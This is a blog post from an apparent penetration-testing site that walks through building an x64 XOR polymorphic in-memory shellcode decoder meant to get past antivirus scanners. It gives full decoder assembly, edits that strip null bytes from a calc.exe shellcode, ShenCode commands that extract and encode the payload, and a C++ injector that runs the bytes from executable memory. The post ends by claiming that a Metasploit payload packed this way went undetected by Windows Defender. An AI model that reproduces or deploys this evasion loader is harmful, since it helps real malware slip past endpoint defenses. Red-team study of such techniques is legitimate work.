{{tag>IT-Security Windows Kali pentest obfuscation blog english}}

====== Obfuscation: polymorphic in-memory decoder ======

{{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}}

Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.

===== XOR decoder =====

I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:

<code asm>
_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP
</code>

''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we now jump to the jump label ''%%call_decoder%%''

<code asm>
call_decoder:
    call decoder        ; RSP points to the next instruction (the shellcode) 

    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...
</code>

Here we see that the ''%%CALL%%''-instruction directly calls another part of the programme. As soon as this happens, the register ''%%RSP%%'' saves the pointer to the next command (in our case the shellcode) on the stack.

<code asm>
decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack
</code>

In the called part of the programme, we save the pointer from the stack to the register ''%%RSI%%'' and know where to address our shellcode in memory.

Now we move on to the actual decryption routine:

<code asm>
decode:
    xor byte [rsi], 0x3F      ; The byte RSI points to, will be XORed by 0x3F
    jz Shellcode              ; jump out of the loop if 0: RSI xor 0x3F = 0
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until each byte was decoded
</code>

''%%xor byte [rsi], 0x3F%%'' now decodes the byte represented by ''%%RSI%%'' is addressed. In this case, this is the first byte of the shellcode. The key for decoding is ''%%0x3F%%'' and can be changed according to the original coding.

''%%jz Shellcode%%'' now checks whether the decoded byte ''%%0x00%%'' corresponds.

==== $Byte \neq 0$ ====

If the result is negative, the code jumps to the next instruction: ''%%inc rsi%%''

''%%RSI%%'' is incremented and thus points to the next byte in the shellcode, which is decoded during the next run. ''%%jmp short decode%%'' jumps back to the beginning of the function.

==== $Byte = 0$ ====

If the result is positive, the loop is interrupted and the shellcode is executed. It is important to append the key to the shellcode here, because:

''%%0x3F XOR 0x3F = 0x00%%''

This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.

''%%jz shellcode%%'' now jumps directly to our decoded shellcode and executes it.

===== calc.exe Payload =====

We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|from this blog post]]. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:

<code>
# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00
</code>

A 0-byte would thus abort the encoding process early, since ''%%jz shellcode%%'' would regard this as a signal to terminate. We therefore need to make a few modifications.

==== GS Register ====

The fix for the GS register from the previous post only removes $2/3$ 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov al, 60h
mov rax, gs:[rax]             ; 65 48 8b 00
</code>

change to:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov rax, gs:[rax+0x60]        ; 65 48 8b 40 60
</code>

This also reduces the size of our shellcode a little.

==== Kernel32-Base ====

When searching for ''%%Kernel32Base%%'' we only use the register ''%%RAX%%'' without calculation. This also results in a 0 byte. Here, however, we can use the register ''%%RBX%%'' register and thus avoid the 0 bytes.

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rax, [rax]				; 48 8b 00
mov rax, [rax]  			; 48 8b 00
</code>

change to:

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rbx, [rax]  			; 48 8b 18
mov rax, [rbx]   			; 48 8b 03
</code>

==== JMP SHORT ====

<code asm [enable_line_numbers="true",start_line_numbers_at="76"]>
jmp short InvokeWinExec            ; eb 00
</code>

Here the code jumps to the next instruction. As the code also does this without ''%%JMP%%'' we can comment out the line.

==== Compile ====

We can compile the code and get a clean op-code.

<code batch>
nasm -f win64 calc.asm -o calc.o
</code>

===== XOR decoder stub =====

==== Prepare calc.exe payload ====

We now need to edit the op-code a little in order to be able to use it in the decoder. I use my ShellCode tool for this [[https://github.com/psycore8/shencode|ShenCode]]:

<code python>
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
</code>

Step by step:

  - We extract the actual shellcode from the file ''%%calc.o%%'' and save it in ''%%calc.raw%%'' (from offset ''%%60%%'' to ''%%311%%'')
  - We encode the extracted code with the key ''%%63%%'' and save the result in ''%%calc.xor%%'', ''%%63%%'' decimal corresponds to ''%%3F%%'' Hexadecimal
  - We output the encoded shellcode in C# format (which we can also use for assembler)

We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end.

==== XOR decoder and payload ====

Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared code into the last instruction of the XOR decoder:

<code asm>
 ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
</code>

We also check whether the XOR key matches:

<code asm>
decode:
    xor byte [rsi], 0x3F
</code>

If everything is correct, we compile our decoder:

<code batch>
nasm -f win64 xor-decoder.asm -o xor-decoder.o
</code>

We then search for the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file:

<code python>
python shencode.py formatout -i xor-decoder.o -s inspect

0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00

python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329

[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!

python shencode.py formatout -i xor-decoder.stub -s c

[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
</code>

===== Inject.cpp =====

We can now insert the bytes we have just prepared into our injector programme and compile it.

<code cpp>
#include <stdio.h>
#include <windows.h>
#include <iostream>
#pragma warning

unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";

int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
	memcpyPtr(exec, payload, byteArrayLength);
	((void(*)())exec)();
    return 0;
}
</code>

===== Debug =====

For testing purposes, I have started a debugger and am now navigating to the memory area of the XOR decoder. During the debug, you can see step-by-step how the instructions in the lower area are decoded. This can be seen in the images below the ''%%call%%'' statement (which is ''%%Shellcode: db ...%%'' corresponds to).

{{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}}

{{it-security:blog:2024-250-animation.gif|}}

The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.

===== Test with a Metasploit payload =====

The whole thing also works with a Metasploit payload:

{{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}}

===== Conclusion =====

To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]] as a template. With two commands, we generate an XOR in-memory decoder:

<code python>
python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63
</code>

The XOR decoder provides effective memory protection. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.

~~DISCUSSION~~